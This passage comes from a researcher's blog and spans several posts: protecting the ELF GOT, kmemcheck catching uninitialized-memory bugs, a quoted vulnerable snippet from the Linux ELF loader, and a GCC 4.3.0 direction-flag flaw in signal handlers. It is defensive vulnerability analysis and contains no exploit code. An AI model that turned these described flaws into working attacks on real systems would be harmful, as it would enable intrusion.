struct = CustomProtocol.new(pkt.tcp_data)
puts sprintf("ASCII Header: %s\tLength: %x\tNext Hdr: %x\tNext Tag: %x\tType: %x\tData: %s",
struct.header, struct.length, struct.next_hdr, struct.next_tag, struct.type, struct.data)
end
end

Tuesday, June 03, 2008

Known API's and automated static code analysis

I did some quick work a few weeks ago on automating static code analysis by using known API's to generate information about data structures and logic flow. The work is not ground breaking but I felt the techniques are quite useful and I wanted to document them clearly for myself and others. You can grab the short paper here.

It's interesting that slides Halvar presented in 2004 on automating reverse engineering are entirely still relevant. He made a good point ... "no matter how stupid an analysis tool is, some programmers will make mistakes which are stupider". How true...

Friday, May 02, 2008

Self Protecting GOT

I had some time to kill over the past few days and I wanted to explore an idea I had a few months ago. The idea is to protect the ELF GOT (Global Offset Table) (and other segments of memory) from userland without the support of 'relro' functionality now found in the GNU dynamic linker. I accomplished it through techniques such as linker script modification and constructor functions. No kernel modifications are needed and I have tested it on a semi large project (Snort IDS).

You can find the draft version 1.1 of my writeup here. If you find any mistakes let me know and I will fix them.

Friday, April 18, 2008

kmemcheck and an old bug

I wanted to do a quick post about 'kmemcheck' because I think the concept is pretty cool. It's a debugging patch in its 7th rev that is now proposed for the mainline Linux kernel in 2.6.26 and the idea is pretty simple but has lots of security uses...
"kmemcheck is a patch to the linux kernel that detects use of uninitialized memory. It does this by trapping every read and write to memory that was allocated dynamically (e.g. using kmalloc()). If a memory address is read that has not previously been written to, a message is printed to the kernel log."
The author provided a sample log file from the patch which is here. I spent a few minutes browsing it and I think it definitely shows promise for more than debugging. **Consider the case of these ELF loader vulnerabilities found by Paul Starzetz in 2004. Bug [1] is basically incorrect checking of the kernel_read() return value. Here's the bug:

...

size = elf_ex.e_phnum * sizeof(struct elf_phdr);
elf_phdata = (struct elf_phdr *) kmalloc(size, GFP_KERNEL);
if (!elf_phdata)
goto out;

retval = kernel_read(bprm->file, elf_ex.e_phoff, (char *) elf_phdata, size);
if (retval < 0)
goto out_free_ph;

...

The code above makes the incorrect assumption that kernel_read() will return less than zero if an error occurs. This is true however kernel_read() can also return greater than zero but less than 'size'. Which in this case leaves a portion of elf_phdata uninitialized. Whats my point? I'm getting to that. An attacker can potentially control this uninitialized data and take control of a process image. Now this particular bug is pretty hard to trigger and even harder to exploit. But the important thing is kmemcheck may have caught this particular issue, and others like it. kmemcheck would fire off a log entry when the ELF loader goes to read the uninitialized data in elf_phdata because technically the attacker controlled data was never written to it in this context, its old 'left over' data. Very neat stuff.

The kernel allocators are a bit more complex than malloc in userland though. The slab code has many small details about it that can make or break a kmalloc based vulnerability, but the concept here is very intriguing regardless. You can grab the kmemcheck patches here.

**As a side note, I took a quick look at linux/fs/binfmt_elf_fdpic.c and found this bug in virtually the same place as Paul found it and in an additional spot as well, where the program interpreter is loaded. They affect a small population and have already been fixed.

Wednesday, March 19, 2008

CLD/STD and GCC 4.3.0

Some of you may have seen this already. Its a very subtle bug that was exposed by GCC 4.3.0 that manifests itself in an interesting way. Heres a quick overview. In its latest version, GCC has changed a very small detail. Before version 4.3.0 GCC would insert a CLD (Clear Direction Flag) instruction before any inline string copy functions as shown below:

804de86: fc cld
804de87: f3 a4 rep movsb %ds:(%esi),%es:(%edi)
804de89: 89 c1 mov %eax,%ecx
804de8b: c1 e9 02 shr $0x2,%ecx

This instruction (CLD) clears a flag that determines which direction data should be written in (forward or backward). The flag itself is stored in the EFLAGS register. Clearing the flag with CLD sets the flag to 0 (forward). The STD instruction can then change this by setting the flag to 1 (backward). GCC no longer emits this instruction before inline string copies. This change is documented here. Technically this is right because the ABI states the direction flag should be cleared before entering any function (see page 38 under EFLAGS). The problem in this case is that the Linux kernel does not clear the flag when entering a signal handler. So in theory the flag is set to 1 for whatever reason and then a signal gets tripped and calls something like memcpy or memmove. Since the CLD instruction is no longer used inline the copy can
write data in the wrong direction. This can obviously lead to security issues. I put together some x86 example code for this based on the x86_64 version posted to LKML, you can find it here.
./cld
Hit Ctrl+C
In signal handler...
DF = 1 (backward)
In signal handler...
DF = 1 (backward)
In signal handler...
DF = 0 (forward)
In signal handler...
DF = 0 (forward)
In signal handler...
DF = 1 (backward)